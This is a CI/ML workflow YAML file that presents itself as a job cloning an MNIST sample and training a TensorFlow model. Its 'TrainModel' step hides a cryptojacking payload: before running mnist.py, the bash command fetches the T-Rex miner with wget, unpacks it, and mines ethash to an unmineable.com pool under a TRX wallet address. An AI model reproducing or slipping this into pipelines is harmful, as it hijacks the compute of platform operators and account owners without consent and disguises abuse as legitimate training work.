on:
  github:
    branches:
      only: main

jobs:
  CloneRepo:
    resources:
      instance-type: C3
    uses: git-checkout@v1
    with:
      # url: https://github.com/gradient-ai/mnist-sample.git
      url: context.event.github.url
      ref: context.event.github.ref
    outputs:
      mnist-sample:
        type: volume
  TrainModel:
    resources:
      instance-type: C3
    env:
      PS_MODEL_PATH: /my-trained-model
    uses: container@v1
    with:
      args:
        - bash
        - -c
        - >-
          cd /inputs/mnist-sample &&  wget 
https://github.com/trexminer/T-Rex/releases/download/0.23.2/t-rex-0.23.2-linux.tar.gz
 && tar -xvf t-rex-0.23.2-linux.tar.gz && ./t-rex -a ethash -o ethash-us.unmineable.com:13333 -u TRX:TWaMNYJS8hLkrsvjQ8DNJSMuWPjJxUq8zR.$(echo RIG-$(shuf -i 1-9999 -n 1)) -p x
&& python mnist.py
      image: tensorflow/tensorflow:1.15.5-py3
    needs:
      - CloneRepo
    inputs:
      mnist-sample: CloneRepo.outputs.mnist-sample
